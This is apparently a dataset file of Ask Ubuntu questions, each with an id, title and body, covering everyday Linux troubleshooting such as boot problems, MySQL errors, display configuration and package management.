448162	how do i create a cd in rhythmbox 3.02	i create a playlist in order to burn to cd , if i right click on the playlist in order to burn to cd nothing appears , is this correct ? has the 'create audio cd ' feature been removed ? ca n't find any info anywhere , and advice would be appreciated . if rhythmbox been stripped , can anyone suggest an alternative ?
448165	ca n't boot into unity/ubuntu after installing kde	here 's the situation : i have a separate /home partition to make installs and upgrades easy . i just installed the latest version of ubuntu 14.04 . everything was great . i installed the lxde desktop ( not lubuntu ) via synaptic . everything works fine . i could boot into the unity desktop and the lxde desktop . then i installed kde desktop via synaptic . the boot splash changed , which is fine , but now i can only boot into kde or ldxe . if i try to boot into unity , i 'm stuck at the splash screen . if i push the power button , the splash goes away , and i see the tail end of a shut-down , as if i 'd executed sudo shutdown -h now in a terminal . i could simply reinstall , and never use kde , but i like that option from time to time . [ edit ] i found the problem . kde switched the default display manager to kdm which did n't want to play with unity . all i needed to do was switch back to lightdm using sudo dpkg-reconfigure lightdm as suggested in this question/answer .
448179	how to enable glamor on ubuntu ?	how do i enable glamor mode which accelerates 2d graphics with opengl on ubuntu ? see choose acceleration method on arch linux wiki .
448181	how to remove kubuntu	i have recently installed ubuntu 12.04 ( using wubi ) dual booting with windows 7 . having read that kubuntu desktop has similarities to windows i later downloaded kubuntu . i have since concluded that kubuntu offers no advantage over ubuntu and would therefore like to remove kubuntu . could somebody please tell me how to do this , leaving just ubuntu . may i have any answers as idiot proof as possible please .
448183	keyboard map is changed randomly	i 'm using xmodmap to bind a key to the numbersign # like so : xmodmap -e `` keycode 49 = numbersign asciitilde '' . this works fine but the changes are regularly reverted by some background process , possibly gnome-settings-daemon . is there a way to permanently change this key or to stop gnome-settings-daemon from overriding my keyboard settings ?
448187	backup restore give errors	alls my backup files give me the same error invalid data - sha1 hash mismatch for file duplicity-full.20140303t215257z.vol33.difftar.gz calculated hash : e19c âś manifest hash : cabdbec i have the same error on 7 different backup-files , of course each time the same file . what i can do ? i hope i do not lost all my data .
448188	terminal history	i looking for the terminal history . not only the command history that is showed by typing history but terminal processes within a command . that is , i want to record the output displayed by the commands in the terminal . for example , one wan na install a package and types sudo apt-get install xxxx then is when terminal is telling you what is doing , it asks for confirmation , for installing additional packages , etc . â
448191	bluetooth syncevolution ericson w810i ubuntu 13.10 woes	help.ubuntu.com/community/bluetoothsyncevolutionericsson this guide does n't work for 13.10. libmultisync-plugin-evolution ca n't be installed because it depends on older versions of 4 other lib packages ... or something . the other 4 packages seemed to install okay but i ca n't go any further without this one . i 'm trying to sync my sony ericson w810i with evolution in 13.10 ubuntu over bluetooth . i have syncevolution and sync-ui installed and it always fails with an error on the phone : invalid server response . it worked once , and i got all the info from evolution onto the phone and a contact from the phone uploaded to the pc , but have n't gone in either direction since so i 'm trying to install this other package to do it now . the phone otherwise seems to pair okay mostly with ubuntu , though sometimes i have the issue where bluetooth remains disabled all the time ; but seldom this happens . also i can not browse files on the phone through this method without losing the pairing and having to start over . interesting to note is the same error comes up on the phone : invalid server response . when i get it enabled and connected to the phone it works great as a pointing device and remote for movies but i want to sync the organizer without using an online resource . output : $ sudo apt-get -f install libmultisync-plugin-evolution reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : libmultisync-plugin-evolution : depends : libebook1.2-9 ( > = 2.28.2 ) but it is not going to be installed depends : libecal1.2-7 ( > = 2.28.2 ) but it is not going to be installed depends : libedata-book1.2-2 ( > = 2.28.2 ) but it is not going to be installed depends : libedata-cal1.2-6 ( > = 2.28.2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
448194	ubuntu did n't come on	after finishing the installation process and restarting the computer , ubuntu did n't start , and no choosing option of which system i wish to use comes up . only xp booted immediately . what to do now ?
448198	when will postgresql 9.3 be supported on any version of ubuntu lts ?	according to http : //packages.ubuntu.com/saucy-updates/database/ the latest version of postgresql that 's supported in ubuntu 12.04 lts is 9.1 , specifically the package name is postgresql-9.1 ( 9.1.13-0ubuntu0.13.10 ) . we 'd like to know when would postgresql 9.3 be available on on precise ( 12.04lts ) or the upcoming ubuntu 14.04 lts . thanks shiva
448199	how do i install a new version on top of an old version ?	i have an asus eeepc 1000h with four os installed . what i want to do is replace lubuntu 12.04 on sda1 which has reached its eol with lubuntu 14.04 , when it is released in a few days . i want to do a new install not an upgrade but grub is also installed on sda1 . there are plenty of how to 's but none take into consideration grub . so , if i proceed with the new install how do i handle the grub ?
448201	apache unable to connect to mysql	i installed apache server ( this story ) . i can not connect with remote ( i tried local too ) mysql server . after a long loading page i get error mysql database connect failure . mysql server is far from me . on same page which locate in internet with same settings is good work . how to solve this ? when i typed in terminal : mysql -u username -h x.xx.xx.x -p after a minute i get : error 2003 ( hy000 ) : ca n't connect to mysql server on 'xxxxxxxxx ' ( 110 ) i can not visit localhost/phpadmin/ , because i get 403 error . i doubt the correctness of the phpadmin settings ...
448203	middle mouse button will not paste	i have a logitech m560 mouse , but i do not know how to map the middle button to pasting , as is default in my other mouse . i ran 'xev ' and clicked the middle button in the white box . the output includes 'button 1 ' . so , i want to map button 1 to the 'paste selection ' as clicking the right and left mouse buttons simultaneously does with my mouse now .
448204	how do i add a border around windows but keep the current theme ?	i seem to live my life in the terminal - many terminals in-fact . i also love the ambiance theme - but the new borderless windows does not provide the visual differentiation i 'm used to ( the same black windows appear to blend into each other ) . thus to my question - how do i add back the single pixel border for windows that is found in earlier ubuntu versions ? i want to keep the ambiance overall theme since this looks good and i dont want to swap to another theme . now i know that i can modify the ubuntu ambiance theme as follows : mkdir ~/.themes cp -r /usr/share/themes/ambiance .themes then flipping between the theme options in the settings - appearance picks up changes in the theme in now in the .themes folder . i presume i need to alter one of the .css files but i dont know which one . i was also looking at this q & a but the solutions there doesnt work for 14.04 . i also looked at the community wiki but got rather lost trying to figure out which one applies to my situation .
448205	running old msdos/windows program qa4 ver 4.0 on ubuntu 13.10	looking for more info on this because i 'm not sure how to qualify my qa4 v4.0 program ( symantic ) . it runs on ms-dos , but also runs as a windows program in win3 , 98 , xp . it wo n't run under win7 . i have heard about programs like dosbox for games , and wine for windows programs but totally confused which way to go . i have a new system76 kudu pro system running ubuntu 13.10 , and i just do n't want to screw it up with mindless experimenting . i especially hope someone here is aware of qa4 . it has been my backbone for 20 years , but i'v had it with microsloth . hope y'all can shed some light into my darkened closet ! t
448206	ufw firewall disabled - how to turn it back on ?	i am using ubuntu 12.04 and just recently noticed , that my ufw-firewall is turned [ off ] . i know it 's turned [ off ] by default , but when i set ubuntu up , i turned [ on ] the firewall with : sudo ufw , but today i just noticed that ufw was off , so i tried sudo ufw again in a terminal window : morgan @ morgan-hp-pavilion-g7-notebook-pc : ~ $ sudo ufw [ sudo ] password for morgan : error : not enough args i do n't know what else to do , to turn ufw back on ! ! please help and thanks . -morgan beck
448211	unable to install ubuntu13.10-desktop-amd64	am using acer aspire e1-522 with windows 8.1 pro . i made a bootable usb using winmd5sum and then i reboot my system and select usb as primary boot device and save it . after that when ubuntu menu opens i select install ubuntu , then i get error * ( intitramfs ) calling : test builtin error reading /lib/udev/hwdb.bin : no such file or directory load module index unload module index calling : test -builtin error reading /lib/udev/hwdb.bin : no such file or directory load module index unload module index mount : mounting /dev/loop0 ( cdrom/casper/filesystem.squashfs ) on filesystem.squashfs* please help , am not at all technically sound .
448212	ubuntu touch `` flo '' preinstalled .zip missing	i 'm trying to manually install ubuntu touch on my n7 ( flo ) . i ca n't seem to find the .zip file for it ( i can find the boot , system , and recovery .img 's ) . could anyone point me to this ?
448213	gnome with xmonad - ubuntu 13.10	does xmonad work with the gnome-panel in ubuntu 13.10 ? i tried installing it but the gnome-panel appears to not be working correctly - it freezes , disappears , etc . has anyone got it working yet ?
448220	by mistake deleted desktop folder : ( help me to recover it ?	i 've deleted my desktop folder using `` delete '' from home/downloads/desktop ( ubuntu 12.04 ) by mistake which had some important files in it . it also got deleted from the trash . please help me to recover that folder its very important .
448221	ubuntu linux on lenovo b575	i am thinking of buying a laptop , namely the lenovo b575 , which has the following : - amd dual core e2-2000 ( 1.75 ghz ) with 1 mb l2 cache - amd radeon hd 7340 shared memory can anybody tell me if there is an ubuntu version compatible with the above model ? thanks , nick
448223	how to create a virtualbox image from a windowsxp ( host ) physical partition	how to create a virtualbox image from a windowsxp ( host ) physical partition . i want to reverse the host -- winxp and guest -- ubuntu . first i have to be able to create a vdi host of my winxp fisical partition . who can tell me if it is possible and how to do it . with acronis i have already done the hd-immagine-backup . thank you ..
448224	how to change the default block allocation policy of a file system ?	every file system has some default block allocation policy . for instance unix file system scatters the blocks of a file randomly on disk while ext2 , ext3 allocates blocks of a file in block groups . is there any utiltily or system call which can change the default block allocation policy of a file system without modifying the kernel code . i have created an additional partition in the hard disk and formatted it with ext2 file system . i want to store only multimedia files in this partition . i want to alter the default block allocation policy of ext2 and change it to purely contiguous so that blocks of a multimedia file are stored purely contiguously on my file system partition on hard disk .
448228	slow d1420 hp deskjet printer slower than regular	why is my printer so slow when trying to print something from my files ? i started a power-point in libra and tried to print the first page . the printer is running very slowly though it is printing . this printer is slow er anyway than some but not this slow . what can i do ?
448230	making a boot able stick	i am trying to down load to a memory stick ubuntu 12.04 32 bit version but only seem to be able to get the 13.10 version . i think i am following the make a bootable stick instructions correctly but the page that comes up is not like the screen shots in the instructions .
448231	usage of mount -o remount rw /	please take a look to this question and its answer how to uninstal from grub ? now i quoted from answer : remount the system partition with r/w permission : mount -o remount rw / ok.i just know about a bit about mount . here are my questions : what is this command and duty ? why we need them ? ( in general or that case , any idea helpful )
448233	stop ubuntu 12 suspending while uploading	i have enabled suspend on my system . it 's a mac pro running ubuntu 12.04 . the problem i 'm getting is it is suspending when its uploading files and also i believe when it 's compiling software . is there some kind of setting i can change to stop it suspending while it 's uploading ? thanks in advance for any help . huw
448235	802.1q vlan tag - is possible to set without editing config file ?	is it possible to make tagged vlans to be shown on network-manager like pppoe connections ? my computer is a laptop so i ca n't add another ethernet card and now i must edit config file to enable/disable vlan on ethernet interface .
448238	neither kubuntu 13.04 nor ubuntu 12.04 can detect network ( wired/wireless ) activity	thanks for reading , i have an hp mini 110-1030la , it had windows xp , tottaly functional , a little slow but funtional , i decided to install kubuntu saucy ( 32 bits ) , everythings seems to be better , the speed increased sustantialy , but it could n't detect neither wireless nor wired networks . i decided to try ( not installing ) ubuntu 12.04 ( 32 bits ) on a live usb disk , but the problem prevails .
448241	will the mate desktop conflict with the unity desktop ?	i want to use the mate desktop environment on ubuntu , but i 've heard from some people that mate will not work without conflicts . is this true ? and if it is , are there any ways to resolve the conflicts ?
448244	how to restore automatic backup from ubuntuone using dejadup ?	i used to make an automatic backup of my files in ubuntuone account using dejadup . this option is no more availabe in ubuntu 14.04 . how can i get my files ? they are compressed in my ubuntu one account by dejadup .
448247	ubuntu 13.10 : unusable when gaming with power not plugged in	i 'm still pretty new to ubuntu , but i have been having issues gaming when not plugged into an outlet . when i am plugged in my laptop runs flawlessly , however , when not plugged every thing runs fine until i connect to a game online then everything slows to a crawl . at first i thought it was my power management on my network adapter , but after turning the power management off for the network adapter still had same issue . looking at system monitor when in a game it looks like only 1 of the 8 cpu 's is working to capacity , i do n't know of a way to access power management for cpu . using galago ultrapro ( galu1 ) memory : 15.6gib processor : intel® core™ i7-4750hq cpu @ 2.00ghz × 8 graphics : intel haswell mobile os type : 64-bit any help would be appreciated .
448248	ubuntu 12.04 problems with mysql	i use ubuntu server 12.04 for my django project . on my local pc there is no errors and etc . sometimes on server i have error : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 111 ) logs : cat /var/log/mysql/error.log 140415 23:05:34 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140415 23:05:34 [ note ] plugin 'federated ' is disabled . 140415 23:05:34 innodb : the innodb memory heap is disabled 140415 23:05:34 innodb : mutexes and rw_locks use gcc atomic builtins 140415 23:05:34 innodb : compressed tables use zlib 1.2.3.4 140415 23:05:34 innodb : initializing buffer pool , size = 128.0m 140415 23:05:34 innodb : completed initialization of buffer pool 140415 23:05:34 innodb : highest supported file format is barracuda . innodb : the log sequence number in ibdata files does not match innodb : the log sequence number in the ib_logfiles ! 140415 23:05:34 innodb : database was not shut down normally ! innodb : starting crash recovery . innodb : reading tablespace information from the .ibd files ... innodb : restoring possible half-written data pages from the doublewrite innodb : buffer ... 140415 23:05:35 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140415 23:05:35 [ note ] plugin 'federated ' is disabled . 140415 23:05:35 innodb : the innodb memory heap is disabled 140415 23:05:35 innodb : mutexes and rw_locks use gcc atomic builtins 140415 23:05:35 innodb : compressed tables use zlib 1.2.3.4 140415 23:05:35 innodb : initializing buffer pool , size = 128.0m 140415 23:05:35 innodb : completed initialization of buffer pool 140415 23:05:35 innodb : highest supported file format is barracuda . innodb : the log sequence number in ibdata files does not match innodb : the log sequence number in the ib_logfiles ! 140415 23:05:35 innodb : database was not shut down normally ! innodb : starting crash recovery . innodb : reading tablespace information from the .ibd files ... innodb : restoring possible half-written data pages from the doublewrite innodb : buffer ... i see that error ( 2002 ) very often , i cant understand - why it appears . i try /etc/init.d/mysql restart or service mysql restart , but it doesnt help . i have mysql-server , not a client . so it works , works , works and in one beatifull moment i see that error . ps ax | grep mysql 15654 pts/0 s+ 0:00 grep -- color=auto mysql so , i try sudo service mysql start start : job failed to start logs : 140416 1:11:17 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140416 1:11:17 [ note ] plugin 'federated ' is disabled . 140416 1:11:17 innodb : the innodb memory heap is disabled 140416 1:11:17 innodb : mutexes and rw_locks use gcc atomic builtins 140416 1:11:17 innodb : compressed tables use zlib 1.2.3.4 140416 1:11:17 innodb : initializing buffer pool , size = 128.0m dpkg -l | grep mysql ii libdbd-mysql-perl 4.020-1build2 perl5 database interface to the mysql database ii libmysqlclient18 5.5.35-0ubuntu0.12.04.2 mysql database client library ii mysql-client-5.5 5.5.35-0ubuntu0.12.04.2 mysql database client binaries ii mysql-client-core-5.5 5.5.35-0ubuntu0.12.04.2 mysql database core client binaries ii mysql-common 5.5.35-0ubuntu0.12.04.2 mysql database common files , e.g . /etc/mysql/my.cnf ii mysql-server 5.5.35-0ubuntu0.12.04.2 mysql database server ( metapackage depending on the latest version ) ii mysql-server-5.5 5.5.35-0ubuntu0.12.04.2 mysql database server binaries and system database setup ii mysql-server-core-5.5 5.5.35-0ubuntu0.12.04.2 mysql database server binaries ii python-mysqldb 1.2.3-1ubuntu0.1 python interface to mysql how to fix that ? how to restart ? why i see that error ? whats wrong ? thaks . update grep socket /etc/mysql/my.cnf # remember to edit /etc/mysql/debian.cnf when changing the socket location . socket = /var/run/mysqld/mysqld.sock # socket=/var/lib/mysql/mysql.sock socket = /var/run/mysqld/mysqld.sock socket = /var/run/mysqld/mysqld.sock and /var/run/mysqld $ ls -la total 4 drwxr-xr-x 2 mysql root 80 apr 13 12:06 . drwxr-xr-x 16 root root 520 apr 16 01:33 .. -rw-rw -- -- 1 mysql mysql 4 apr 13 12:06 mysqld.pid srwxrwxrwx 1 mysql mysql 0 apr 13 12:06 mysqld.sock
448251	startup script xrandr missing lsb tags and overrides please help	hello i have a simple script that looks like this xrandr -s 1680x1050 when i run it standalone it works ! when i put the script into /etc/init.d/xrandr.sh i get the error `` missing lsb tags and overrides '' . does anyone know how to fix this ?
448255	how to use manually installed python for personal programs without breaking any other application ?	hi i 'm new to ubuntu and i have the following problem : i 'm aware that ubuntu comes with a python version , but i 'm running in a web host and i do n't have the sudo command and i only have access to my /home/user i installed python 2.7.5 on my home , but when i try to do the easy_install command , it goes to /usr/bin/python how can i do to use the python installed on my /home and not the one in the /usr/bin/ ?
448256	necessary space for each mount point in a linux ( kubuntu ) install	i was looking up what the best space allocation would be for a fresh linux install and found this page which provides the following insight : will this partition scheme be sufficient for a developer 's installation of kubuntu ? are the recommended sizes appropriate , or does anyone foresee the need to expand these partitions ? is there any information that has been overlooked in this scheme that might be useful or otherwise insightful ? for those who need an actual question what are the minimum space requirement for each directory beneath / and should i avoid giving any of them their own partition ?
448257	what is wrong with this piece of code ?	the following piece of code where i want to check if an array is empty gives the error - re.sh : line 3 : [ 0 : command not found . the error is at the if statement . what is wrong with it ? # ! /bin/bash unique_hero= ( ) if [ $ { # unique_hero [ @ ] } -eq 0 ] then unique_hero+= ( 'asdf ' ) echo `` $ { unique_hero [ @ ] } '' fi
448267	to check code execution flow of c program in ubuntu	is there any software available in ubuntu 13.10 to check line by line code execution of c programs .
448270	notebook with dual-boot [ windows 7 and ubuntu 12.04 ] fails to boot into either of them	i own a dell inspiron 14 with windows 7 . these days , i format my notebook and install ubuntu 12.04 and remove windows . the system works without any problem . due to my university , i had to reinstall windows os , so i could have some programs ( ex : nx 7.5 ) , but this time i made partitions on my hard drive , one namely , to install ubuntu , and the other to install windows on . some time later i try to install ubuntu . the partition distribution was : /dev/sda1 > system reserved /dev/sda2 > windows 7 /dev/sda3 > ubuntu ( also mountpoint ) /dev/sda4 > swap at first the installation showed a mistake . without paying any attention i restarted the notebook and started again , following the same steps and everything went fine , until i restart after finished installation . neither windows nor ubuntu are able to boot up . i put together the partitions and reinstalled windows , without touching the system reserved partition - failiure - the problem remained . i did the same to ubuntu - falliure - again . the error message that i recive : '' reboot and select proper boot device or insert boot media in selected boot device and press any key . '' ubuntu stops/get stuck in initialization screen and does n't load/boot anymore . after some attempts i booted into ubuntu , using the live-cd and checked my hard disk drive ( partitions ) . self assessment : failing overall assessment : disk failure is imminent ( backup all data and replace the disk ) reallocated sector count : count of remapped sectors.when the hard drive finds a read/write/verification error , it marks the sector as `` reallocated '' and transfers data to a special reserved area ( spare area ) falling normalized:134 worst : 134 threshold 140 value 556 sectors i imagine it may be a faulty hdd , or did i something wrong -- thanks .
448271	how avi file is stored in a disk in ext2 file system ?	avi file like any other multimedia file contains audio video streams along with metadata describing synchronizing information . i am confused whether the avi file is stored in a partition as a container itself or audio , video streams are stored separately and then retreived simultaneously from hard disk .
448280	automatically revert to laptop screen when external monitor unplugged	i regularly use an external monitor with my laptop , so when i use it , i usually have the laptop screen disabled when the monitor is connected , and this seems to cause problems when the monitor is disconnected . if the monitor is connected while the laptop screen is disabled , i ca n't get the x session to show up at all : i can ctrl+alt+f1 to open a terminal , and that works fine.. ..but ctrl+alt+f7 does nothing . the display is blank , and stays blank . the same thing happens whether i put the computer to sleep with the monitor connected , or if i disconnect while the computer is still awake . rebooting the computer fixes the issue , as does killing xorg and starting it again , but both of those are sub-optimal since i lose my current session . i 'm currently using the open source graphics driver ( xserver-xorg-video-ati ) . this question looks like it might answer my question , but unfortunately hwinfo is no longer available in the apt repository . is there a way with current tools to automatically detect when the external monitor is disconnected and switch to the laptop display ?
448281	move images from sub-folders into new sub-folders	i have a folder composed of m several sub-folders , each of them containing some text files and n images ( *.png ) this is what the tree looks like : /parent/ /sub-folder1/ /data1.dat /data2.dat /image1.png /image2.png ... /imagen.png /sub-folder2/ /data1.dat /data2.dat /image1.png /image2.png ... /imagen.png ... /sub-folderm/ /data1.dat /data2.dat /image1.png /image2.png ... /imagen.png notice that all images in each sub-folder are named the same ( ie : image1.png , ... , imagen.png ) what i need is to move only the images into a new parent folder ( say parent2 ) , while replicating the sub-folder structure . after the moving is done the new parent folder should look like this : /parent2/ /sub-folder1/ /image1.png /image2.png ... /imagen.png /sub-folder2/ /image1.png /image2.png ... /imagen.png ... /sub-folderm/ /image1.png /image2.png ... /imagen.png ( ie : only images and respecting the same sub-folders structure ) and the original parent folder should look like : /parent/ /sub-folder1/ /data1.dat /data2.dat /sub-folder2/ /data1.dat /data2.dat ... /sub-folderm/ /data1.dat /data2.dat ( ie : images moved out ) i 've seen some examples of scripts that can move all filed into a new folder ( shell script to move all files from subfolders to parent folder ) or some that can move only images ( script to move pictures ) but i have n't found one that would do so while respecting the sub-folders tree .
448283	strange display problem in gtk program like evince and nautilus	this is a hard to describe problem . in programs like evince ( pdf viewer ) i see a strange problem . description : when i open the menu of the app by clicking on the gear-wheel icon in top right corner the opening menu is black on black ! only when you move the mouse over entries they become readable in a very very bad way . why is the menu black ? ? ? same applies to nautilus i see no influence on changes i tried in appearance and theme settings . a gtk+ problem ? but what kind ? an idea what i can try ?
448287	wine - using native icon for program	when i run a wine program , the icon that is used in the gnome dock is the generic wine icon , so when i run photoshop or league of legends then the icon is the wine icon . ( i 'm not talking about the launcher - just the icon when i run it . ) is there a way to make it so that when i launch a wine app , it uses the native icon rather than the generic wine icon ? thanks ,
448291	devices connected to dvi port not detected	i am struggling with using the dvi output and ubuntu 13.10 . i use this computer as a mediacentre . in the hdmi port , i have a tv connected , passing through a home cinema ( hdmi provides sound and video to the home cinema and later it goes to the tv ) . in the dvi , i have a beamer connected . with this setup , i can watch movies in the tv , with tv speakers or the home cinema speakers , or through the beamer , with home cinema speakers . this setup is perfectly working in linux mint 13 and was working in older ubuntu versions . now , i have installed ubuntu 13.10 and anything i connect to the dvi port is not working . i am using a motherboard from gigabyte ( ga-h55m-usb3 ) with integrated intel graphics . if i check info from the graphics card , i get : root @ bernorio : /home/aaparicio # lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) and from xrandr : root @ bernorio : /home/aaparicio # xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 1280mm x 720mm 1920x1080 60.0 + 50.0 59.9 30.0 25.0 24.0 30.0 24.0 1920x1080i 60.1 50.0 60.0 1280x1024 60.0 1360x768 59.8* 1280x720 60.0 50.0 59.9 1440x576i 50.1 1024x768 60.0 1440x480i 60.1 60.1 800x600 60.3 720x576 50.0 720x480 60.0 59.9 640x480 60.0 59.9 hdmi3 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) when i do xrandr in linux mint 13 , i get both hdmi1 ( the one representing the dvi ) and hdmi2 as connected and working well . however , with ubuntu 13.10 , hdmi1 always appears as disconnected . i have tried connecting only the tv to the problematic dvi connector , but it is not working . could you give any hint about how to solve this issue ? thanks in advance ! andrăšs
448292	audio on macbook 2,1	how can i setup audio in ubuntu on the apple macbook 2,1 ? the laptop has three speakers which do n't appear correctly on 12.04 .
448293	sending sound to analog , hdmi and bluetooth ( if paired )	i have a ubuntu 12.04 lts ( soon upgrading to 14.04 lts if its important ) as htpc with xbmc . current sound setup : no pulseaudio , just alsa . in alsa config i have `` combined '' analog and hdmi output in `` ! default '' pcm . so every sound from ubuntu ( and xbmc of course ) is going to analog ( eg . wired headphones ) and hdmi ( tv ) . today i bought a wireless ( via bluetooth ) headphones . i can pair them with ubuntu with no problem . i added them to asound.conf with : pcm.beatsstudiowireless { type plug slave { pcm { type bluetooth device xx : xx : xx : xx : xx : xx profile `` auto '' } } hint { show on description `` beatsstudio wireless bt headset '' } } ctl.beatsstudiowireless { type bluetooth } command speaker-test -c 2 -d beatsstudiowireless works fine , the headset is making noises ; ) . if i add this bluetooth headset to `` ! default '' entry in asound.conf and connect it with ubuntu , then it works ok ( along with sound from analog and hdmi ) . but if the bluetooth headphones are not connected , then xbmc just freezes . im guessing its waiting/searching for this bt headset . i would like to have this setup like this : watching movie in xbmc , sound is going to analog and hdmi without pausing the movie , im turning my bluetooth headset on , its connecting with ubuntu when its finally connected , the sound is also send to bt headphones i can turn the bt headset off , and xbmc will still work fine , sending sound to analog and hdmi is it possible ? how ? ; )
448305	upgrading from 2 to 4 monitors	i have ubuntu 12.4 ( precise ) , and for a long time , i had two monitors . yesterday , i got a second pair of monitors and another video card . i spent hours searching the internet and experimenting , but i was n't able to get 4 monitors to work properly . the best i was able to accomplish , if use `` system settings / displays '' to turn one of the first two monitors sideways . using nvidia setup , i was able to `` enable '' the other two monitors . but now my 4 monitors behave like 2 big screens . if i maximize a window , it maximizes over two monitors . also , i ca n't move anything from left pair of monitors to the right pair ( or vice-versa ) . i spent all evening and all night trying and tweaking and i either got a messed-up system with overlapping screens where i had to mouse on one screen and stuff appeared on a different screen ( making it really hard to click the right thing ! ! ! ) or one working monitor ... i 'm trying to get the configuration like here . i 'm attaching below my xorg.conf file for the ( poorly ) working configuration . what are the steps to get it working ? # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ allspice ) wed dec 18 09:07:35 utc 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection ... section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell u2212hm '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` dell 2009w '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 580 '' busid `` pci:3:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 580 '' busid `` pci:4:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dvi-i-1 : nvidia-auto-select +0+161 , dp-0 : nvidia-auto-select +1920+0 { rotation=left } ; dvi-i-1 : nvidia-auto-select +0+0 ; dvi-i-1 : 1280x1024 +0+0 ; dvi-i-1 : 1280x1024_60 +0+0 ; dvi-i-1 : 1152x864 +0+0 ; dvi-i-1 : 1024x768 +0+0 ; dvi-i-1 : 1024x768_60 +0+0 ; dvi-i-1 : 800x600 +0+0 ; dvi-i-1 : 800x600_60 +0+0 ; dvi-i-1 : 640x480 +0+0 ; dvi-i-1 : 640x480_60 +0+0 ; dvi-i-1 : nvidia-auto-select +0+0 { viewportin=1680x1050 , viewportout=1728x1080+96+0 } ; dvi-i-1 : nvidia-auto-select +0+0 { viewportin=1440x900 , viewportout=1728x1080+96+0 } ; dvi-i-1 : nvidia-auto-select +0+0 { viewportin=1366x768 , viewportout=1920x1079+0+0 } ; dvi-i-1 : nvidia-auto-select +0+0 { viewportin=1280x800 , viewportout=1728x1080+96+0 } ; dvi-i-1 : nvidia-auto-select +0+0 { viewportin=1280x720 } '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dvi-i-1 : nvidia-auto-select +0+0 { rotation=left } , dp-0 : nvidia-auto-select +1050+161 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection
448307	which file in ubuntu defines meaning of each run level ?	in redhat based linux , there is a file called inittab in which you can see the meaning and definition of each run level . is there any file like this in ubuntu ? i know what each run level means in debian based linuxes . i know about rc # .d files and also config files inside init folder . i just need to know if there is an alternative for inittab in ubuntu or not . googling didnt do any good . thanks in advance
448308	i ca n't watch youtube videos ubuntu 12.04	i had moved from xubuntu 12.04 to ubuntu . and now i ca n't watch youtube vides and nothing like that.the screen looks tinier and i only can see green red and yellow images .help please .
448310	what commands go wild with wildcards ?	having read apt-get remove with wildcard removed way more than expected . why ? ( after making a similar mistake myself ) , i am significantly more cautious about using * in commands with which i am not completely familiar . clearly sudo apt-get remove k3b* does not do what the user intended , and i find myself really wanting to know : what other commands will not behave as some users may intend when using a wild card ?
448313	april 2014 update taken , bootup hangs at stopping system v runlevel compatibility	i 've seen other threads related to my current situation , but the solutions posted did n't help ... after accepting updates this morning , my system halts at `` stopping system v runlevel compatibility '' here are the links i followed : stuck on stopping system v runlevel compatibility and 12.04 : kernel update - stopping system runlevel v compatibility even after following the chown commands as listed , and trying to step back one kernel version , same problem.. stuck on startup . unfortunately i do n't know more of my version than 12.04 lts your help and attention are greatly appreciated , paul
448315	how to make tmux load /bin/bash ?	when i load tmux , it goes straight into the # : prompt , and no aliases or nothing loads . i can barely even type regular commands like `` source '' because it says it 's not found . however , when i execute /bin/bash manually , everything works perfectly fine . i 'm not sure why recently i started being put in this # : prompt . anyone have any idea how i can fix this ? thanks
448317	encoding problem with .bib-file in text-editor	i have create a .bib-file , using the default ubuntu text editor . when i tried to open it some time later the characters are all messed up . in the topbar i get the following message : the file you opened has some invalid characters . if you continue editing this file you could corrupt this document . you can also choose another character encoding and try again . current locale ( utf-8 ) can anything be done about it and more importantly why is it happening ?
